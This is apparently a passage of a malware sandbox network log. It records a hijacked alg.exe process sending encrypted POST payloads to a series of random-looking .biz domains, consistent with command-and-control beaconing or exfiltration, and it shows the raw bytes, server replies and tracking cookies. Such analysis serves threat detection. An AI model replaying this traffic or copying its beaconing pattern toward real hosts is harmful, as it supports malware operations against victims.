                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
45 | 192.168.2.7 | 50024 | 54.244.188.177 | 80 | 5368 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:57:46.355870962 CET | 349 | OUT | POST /xubhw HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: dwrqljrr.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:46.355895996 CET778OUTData Raw: 78 fb 2a a3 96 57 38 58 fe 02 00 00 c5 e5 2a 1a 11 14 6b 28 38 11 de 4f a2 9d dd 8e 24 f8 6f de 9f a8 c4 23 20 3c b8 8a 05 95 35 09 b9 80 21 a0 6e 7e cc 2e 64 4c 93 23 5c 30 59 d4 44 ea f6 a3 1e 39 39 70 f0 35 a9 91 4e a7 58 73 1d d7 b4 2c fb 90
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: x*W8X*k(8O$o# <5!n~.dL#\0YD99p5NXs,t[?9)aPp^>s`vtkZ*WXF3K%&IAZv$nG]R,DS[JAyrvQ"JP^(i9MHP:D0;ej%I!:ta
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:47.184914112 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:57:47 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=2c256c25e1ea79705aba050f4748446e|155.94.241.187|1731920267|1731920267|0|1|0; path=/; domain=.dwrqljrr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
46 | 192.168.2.7 | 50025 | 35.164.78.200 | 80 | 5368 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:57:47.667769909 CET | 345 | OUT | POST /mvx HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: nqwjmb.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 18, 2024 09:57:47.667795897 CET | 778 | OUT | Data Raw: 1d 98 31 7e be 35 1d b2 fe 02 00 00 c4 52 4a 8f ae c4 17 0a c2 d5 6a 13 f7 f0 b7 e5 2d 5f bd ab ae 4e a8 b9 fa e3 fe 39 77 8d 83 2f 43 c6 33 ed e5 82 ed 35 00 be 9d db 68 09 1b 9e f9 ef 16 07 a1 24 59 f9 84 62 1c fa 58 e6 59 4a 06 f2 e7 55 3c 76
Data Ascii: 1~5RJj-_N9w/C35h$YbXYJU<vh/0zq[i1L;r\=2Q2Os^kSB?IL[(Q=HfrPHPBG[p]bPIFnx0)+T(Kk~c
Nov 18, 2024 09:57:48.490973949 CET | 414 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 18 Nov 2024 08:57:48 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=575ce9ee2e219b19863d295a96ae1e1c|155.94.241.187|1731920268|1731920268|0|1|0; path=/; domain=.nqwjmb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
47 | 192.168.2.7 | 50026 | 3.94.10.34 | 80 | 5368 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:57:48.655607939 CET | 359 | OUT | POST /fmngqrfquhhkif HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ytctnunms.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 18, 2024 09:57:48.655630112 CET | 778 | OUT | Data Raw: 5c 8b f7 39 97 ff 6e 9e fe 02 00 00 66 fb 53 f7 bb a4 a9 44 b9 c1 f8 21 8b 34 fd 2d e3 47 8a b6 42 de 33 1d 52 08 40 29 bf 01 ed 21 1c 0d d7 36 cc b4 c8 62 1a 25 fb 2a 9f e5 4c 3c b3 da c1 47 13 81 55 6f 97 19 85 ca 50 75 f5 ed 63 ed 85 5f 20 a1
Data Ascii: \9nfSD!4-GB3R@)!6b%*L<GUoPuc_ XOi#3hWUv>eH|xO+!uSAfdCM~aL#;82f)1=^h#K;k5ct;+c2?fJL^I;z
Nov 18, 2024 09:57:49.302148104 CET | 417 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 18 Nov 2024 08:57:49 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=3eee62bd42e55fbce50d6342208b893e|155.94.241.187|1731920269|1731920269|0|1|0; path=/; domain=.ytctnunms.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
48 | 192.168.2.7 | 50027 | 165.160.13.20 | 80 | 5368 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:57:49.598207951 CET | 356 | OUT | POST /vblbtbbfmivxyja HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: myups.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:49.598232985 CET778OUTData Raw: cc 96 b7 8a 5a 40 fc 2b fe 02 00 00 b7 fa 6e 3e 2a 36 e9 a7 14 55 e7 78 6d ec c2 2c 08 10 d2 9b 6c 8a 9f 18 c4 f8 40 38 99 06 a9 74 34 80 29 54 2a bf c0 65 21 fe 47 dd ed 12 eb 57 cc 56 f5 5b 32 7e d4 79 48 2d 56 ca 4e 91 cf a6 07 ff a3 e3 d7 a6
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: Z@+n>*6Uxm,l@8t4)T*e!GWV[2~yH-VNjb-z{\=(CGULFy/mg*P-(9\c\V`F8PAQcXwrpyI*6SB.1O
Nov 18, 2024 09:57:50.389439106 CET | 170 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:57:50 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 94
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 2e 31 2e 37 22 20 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: <html><head><title></title><meta name="revised" content="1.1.7" /></head><body></body></html>
Nov 18, 2024 09:57:50.485687971 CET | 352 | OUT | POST /aisrtinfavo HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: myups.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:50.485749960 CET778OUTData Raw: 2a 14 68 27 e8 1d c6 e1 fe 02 00 00 9a a1 d8 8c 3e e0 b0 ec c0 08 1d 14 77 ec e6 d1 41 c8 4e 21 db 05 40 d9 bc 05 d0 e7 a4 1f 21 8a 06 28 02 f6 a0 92 d6 e1 11 8e 94 28 54 7d 3d 5b a6 9b 91 c7 c8 95 07 86 f2 10 c9 40 94 49 47 90 11 d6 76 2f 8f 56
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: *h'>wAN!@!((T}=[@IGv/Vu%^^4}xE=5zB[U7oDJSGs||~VQV-7il%"WWgxCcL4Dq2p^*6M#}`17.yy"BV
Nov 18, 2024 09:57:50.706978083 CET | 170 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:57:50 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 94
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 2e 31 2e 37 22 20 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: <html><head><title></title><meta name="revised" content="1.1.7" /></head><body></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
49 | 192.168.2.7 | 50028 | 82.112.184.197 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:57:50.074286938 CET | 352 | OUT | POST /gsvxqic HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: vjaxhpbji.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:50.074286938 CET842OUTData Raw: 86 b9 5c 6e 38 0b 6f 59 3e 03 00 00 ea d1 c8 19 29 f0 06 e0 54 f0 6b 9d 6c da a0 9c 5c f5 54 29 23 04 11 01 92 24 4b e7 66 1e 24 d0 b0 bc 2d 26 c4 cb d7 e4 44 71 c4 b5 dc 89 83 26 df be 67 37 80 87 c2 09 9b 93 02 9f 2a af 18 dd 59 e4 ec ec 9a 72
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: \n8oY>)Tkl\T)#$Kf$-&Dq&g7*YrhV+08,*f;%HeG\f_P-M@;Tkm=T~Ta[mP0<zaQC/@I&Z"ehC5C#u=UA~


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
50 | 192.168.2.7 | 50029 | 54.244.188.177 | 80 | 5368 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:57:51.020060062 CET | 349 | OUT | POST /jfcm HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: oshhkdluh.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:51.020090103 CET778OUTData Raw: 84 72 8d 79 2c 21 c7 36 fe 02 00 00 d9 7c 2a 29 35 22 a0 01 16 d7 cd 4f b6 d2 8f 63 32 06 b6 08 77 24 c1 ff c4 d1 4f e1 94 5c 1e 08 34 67 6f 35 c9 25 e3 88 c1 15 24 46 b3 fa 05 c5 86 4c d9 dc 5f b4 31 83 5f 99 e3 d7 cf 3f 5a 31 74 76 bb bb eb e3
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: ry,!6|*)5"Oc2w$O\4go5%$FL_1_?Z1tv0iUpAjk,Fu{"8)!3y+%q!UC8Zk[iaG9G&2^E:#U ^i4nI-_"Q>K1FcS8E$rjPD
Nov 18, 2024 09:57:51.869700909 CET | 417 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:57:51 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=b7c85a06e63501217db7a5a8f57c9373|155.94.241.187|1731920271|1731920271|0|1|0; path=/; domain=.oshhkdluh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
51 | 192.168.2.7 | 50030 | 208.100.26.245 | 80 | 5368 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:57:52.118402958 CET | 345 | OUT | POST /xg HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: yunalwv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
Nov 18, 2024 09:57:52.120230913 CET | 778 | OUT | Data Raw: c5 96 59 9e 93 11 72 f1 fe 02 00 00 46 67 cd c0 5d 73 c7 37 60 27 cf 14 95 55 cc 09 fc 62 24 37 f1 60 6e c6 72 00 38 c7 15 3c 7a 3d b6 e1 1a 80 14 e5 78 80 1e db 85 ab 62 75 be 61 1a 5f 2a e0 6f 6d 21 6e c6 3e 46 85 a4 b0 99 8b 9c 89 8e af ae 5c
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: YrFg]s7`'Ub$7`nr8<z=xbua_*om!n>F\|=MMODiY:a8`7nJyJOE3g)ZhJelz6}9IcLg[>v)%Att[5k3!&HjaOg EVCvy&b
Nov 18, 2024 09:57:52.754798889 CET | 744 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:57:52 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 18, 2024 09:57:52.821724892 CET | 359 | OUT | POST /soxbjfwpcadsyans HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: yunalwv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
Nov 18, 2024 09:57:52.821757078 CET | 778 | OUT | Data Raw: ef 66 89 7b bf 15 62 83 fe 02 00 00 81 0e 13 96 96 a3 63 9e 62 2b dd 7b b0 c2 68 e0 da d5 d5 40 bc ce 23 75 8a c2 3d f6 f5 78 8b 8a b8 87 c1 57 d8 3c 2c 35 17 64 2d 0e ac 23 bf 6e 81 df 1e 12 ea d9 a3 48 03 1e 81 20 9d 55 03 96 9d af b7 3b f7 ca
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: f{bcb+{h@#u=xW<,5d-#nH U;>}Y[AC#%JeUyc3SD dyqaHr]d"H10Ue2q fHKozG12tv;k)_85Uv\AWBE_Ys&
Nov 18, 2024 09:57:52.966598034 CET | 744 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:57:52 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
52 | 192.168.2.7 | 50031 | 34.211.97.45 | 80 | 5368 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:57:53.959300041 CET | 356 | OUT | POST /wsppsfoumisskbo HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: jpskm.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
Nov 18, 2024 09:57:53.959326029 CET | 778 | OUT | Data Raw: dd 6d 24 36 0d 56 3f a6 fe 02 00 00 fd 3f 9a a8 bf f2 75 ba 3b cf d3 00 a9 6c c6 a0 4b ba b3 f6 8d b9 3f 8c 9a 9c 42 39 b6 58 9a d5 85 d1 f1 43 0a 8a ae 48 9a 72 b5 5a 2d c2 01 a8 c2 eb 30 5b 8c 90 94 35 3d d9 12 12 35 27 8f df 76 cc d4 65 78 b7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: m$6V??u;lK?B9XCHrZ-0[5=5'vex\)9eji3n)[)0jmBmgACj_A _z@T1yNB~Ubr '>HA*ax1E/"p4fU2JnY&
Nov 18, 2024 09:57:54.800717115 CET | 413 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:57:54 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=e9586c757db92bd241c18209398f6326|155.94.241.187|1731920274|1731920274|0|1|0; path=/; domain=.jpskm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
53 | 192.168.2.7 | 50032 | 54.244.188.177 | 80 | 5368 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:57:55.195871115 CET | 346 | OUT | POST /ja HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: lrxdmhrr.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
